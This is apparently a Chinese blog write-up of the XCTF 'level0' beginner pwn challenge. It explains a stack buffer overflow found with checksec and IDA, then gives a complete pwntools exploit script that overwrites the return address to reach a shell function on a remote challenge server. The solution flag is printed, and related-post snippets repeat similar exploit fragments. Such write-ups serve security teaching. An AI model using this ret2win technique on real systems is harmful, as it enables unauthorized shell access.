XCTF:level0[WriteUP]

于 2024-03-16 21:19:11 发布
阅读量422 收藏 8
点赞数 10
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43007452/article/details/136769106
版权

PWN入门题目:XCTF攻防世界的level0

使用file、checksec命令查看文件详细信息

这是一个64bit的ELF文件(后面编写EXP需要用到)

从checksec中展示的信息看,该二进制文件只开启了NX(数据执行保护)

这样的话就约等于没设防了(新手题难度)

使用IDA对该文件进行反编译

在主函数发现了一个vulnerable_function函数

双击该函数进行审计

buf数组分配了0x80个字节量,而总读取的是0x200个字节,所以考虑栈溢出

按F5查看该函数伪代码

从伪代码模式看可读性更高,read函数将读取0x200个字节

双击buf数组,查看其栈空间

 

我们创造的数据需要覆盖:buf数组+返回地址+寄存器

也就是说构造数据字节数应该等于buf+r+s=80+0+8=0x88字节

审计该文件的其他函数

发现函数callsystem(名字很可疑)

双击打开后对该函数进行反编译发现

这个函数的作用就只是返回一个shell,那么我们栈溢出的目标就很明确了

 

查看该函数的地址:

编写EXP进行漏洞利用

from pwn import *

shell = remote('61.147.171.105','64456') #建立连接

payload = b'a'*0x88 #构造无用数据使栈溢出

payload += p64(0x400596) #64bit文件使用p64并带上callsystem的地址

shell.send(payload) #发送payload

shell.interactive() #与反弹shell交互

 拖到linux终端中运行,获取flag

cyberpeace{ee84d30badc9105389d6fb50e6468e9d} 

0DayHP
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
level0(xctf)
weixin_43868725的博客
05-06 906
0x0 程序保护和流程 保护: 流程: main() vulnerable_function() 很明显的栈溢出,read()允许输入0x200个字符而buf只有0x80 0x1 利用过程 我们在ida的函数窗口处发现了一个callsystem(),可以直接getshell 所以我们只需要将返回地址覆盖成callsystem()的地址就可以拿到flag,buf=0x88*‘a’+p64(0...
XCTF PWN level0
prettyX的博客
06-09 300
查看基本信息 尝试运行 IDA F5 再看下vulnerable_function()函数,存在溢出 同时,还存在callsystem()函数 所以把返回地址,覆盖到callsystem()函数地址,即可 Exp 注意:因为Python2不再维护,编写脚本使用Python3,使用Python3和2的区别,就是把Payload作为占位的部分变成Bytes #python3 from pwn import * p=remote('111.200.241.244',..
xctf--新手练习区--level0
gclome的博客
04-19 648
writeup:拿到这个文件之后先checksec 64位程序,开了NX 然后再运行一下: 会输出Hello,World,然后是输入,我这里输入了aaaaaaaaaaaaaaaaaa 放入IDA里,开始展示的是汇编代码,然后我们F5就可以查看源码,我们先看看main函数里面的: 主函数就是一行打印,一行输入,不过有意思的是,buf的长度是0x80,而read函数允许输入0x200,那我们岂...
# xctf level 0 wp
qq_45895967的博客
01-10 171
xctf level 0 wp 使用checksec 检查一下 64位 开启了NX保护,丢进ida 进入vlunerable函数 发现可以溢出,同时又找到一个后门函数 直接溢出返回callsystem函数拿到flag
pwn入门xctf:level0和[JarvisOj]:level1题解
qq_43627239的博客
07-24 985
xctf的pwn题level0 这是一个简单的栈溢出题 打开题目下载附件拖到虚拟机中查看它的各种保护机制 发现栈区不可执行 我们用物理机中的IDA看一下 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互,跟进去查看发现无参数传入,buf长度为0x80,即0x80h填充满,之后跟上地址就可以实现任意跳转。 接下来查找字符串/bi...
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列14
重新启程
12-23 1830
题目地址:warmup 这是高手进阶区的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
string [XCTF-PWN]CTF writeup系列7(超详细分析)
重新启程
12-20 4002
题目地址:string 先看看题目情况 照例检查一下保护机制 root@mypwn:/ctf/work/python# checksec 167e00a26ef44e1f888b3ede29d88e38 [*] '/ctf/work/python/167e00a26ef44e1f888b3ede29d88e38' Arch: amd64-64-little RE...
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1629
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
stack2 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列15
重新启程
12-23 1347
题目地址:stack2 这是高手进阶区的第四题了,速度挺快啊,朋友!加油! 废话不说,看看题目先 没有什么特别的内容,那就看看保护机制 root@mypwn:/ctf/work/python/stack2# checksec fcca8ceb507544d1bd9c4a7925907a1d [*] '/ctf/work/python/stack2/fcca8ceb507544d1b...
shell [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列25
重新启程
12-27 743
题目地址:shell 这个题目是高手进阶区的第14题,这一题我没有按照顺序来,耍脾气来!呵呵 看看保护机制 [*] '/ctf/work/python/shell/shell' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled ...
xctf攻防世界pwn level0的断点调试
你的小粉丝的博客
07-24 827
level0文件拖入Ubuntu桌面 打开终端:输入cd DESKtop/ gdb level0 开始运行 start 得到如图所示 断点调试 切换到Windows系统,用ida64打开level0 找到main函数的地址,复制 在Ubuntu终端下执行命令:b *0x+刚复制的地址 执行结果如图: 按r运行至断点处 其他命令 ...
level_0 [XCTF-PWN]CTF writeup系列5
重新启程
12-19 637
题目地址:level_0 先看下题目: 照例查看一下保护情况 root@mypwn:/ctf/work/python# checksec df928e471d0849fab9ff0ebe4bfe5ea1 [*] '/ctf/work/python/df928e471d0849fab9ff0ebe4bfe5ea1' Arch: amd64-64-little R...
xctf攻防世界pwn level0
你的小粉丝的博客
07-24 1486
答主也是个小白,学长告诉我要用脚本,我也不会写,用的别人写好的脚本 from pwn import * p= remote(‘111.198.29.45’,33907) elf=ELF(’./level0’) sysaddr=elf.symbols[‘callsystem’] payload=‘a’*(0x80+8)?+p64(sysaddr) p.recv() p.send(payload) p...
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
攻防世界PWN-level0
Deeeelete的博客
11-12 2607
题目:level0 老规矩先进PE 查看是64位程序,可以考虑直接IDA莽,也可以进checksec查一下详细参数 比较脆,无PIE且没了栈保护(Stack-canary),容易GOT改写( RELRO) 简单运行一遍,发现是hello word 进64位IDA 鼠标悬停在main函数上按f5反编译 查看源码: 过于简单,没啥可用的信息,双击它return的脆弱函数进一步查看 int __cdecl main(int argc, const char **argv, const
xctf攻防世界_level1——本地和远程程序不一样
勤劳的小蜜蜂
05-22 765
#-*-coding:utf-8 -*- import pwn from pwn import * #pwn.context.log_level = 'debug' #context(arch = 'i386', os = 'linux') #shellcode = asm(shellcraft.sh())#用函数shellcraft.sh()直接生成shellcode #asm #io = ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8426
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
html+css+js网页设计 个人博客模版 4个页面
最新发布
08-28
预览地址:https://blog.csdn.net/qq_42431718/article/details/141647657 html+css+js网页设计 个人博客模版 4个页面
shibing624-text2vec-base-chinese模型文件
08-28
shibing624_text2vec-base-chinese模型文件
SUSCTF2022 Writeup:Dest0g3 Team的Java挑战解析
作者最初认为这可能是一个涉及Tomcat服务器和EL(Expression Language)表达式绕过的挑战,但考虑到XCTF比赛的复杂性,他们推测这不会那么简单。于是,他们尝试使用自己发现的0day漏洞进行反序列化攻击。然而,当...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0DayHP

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值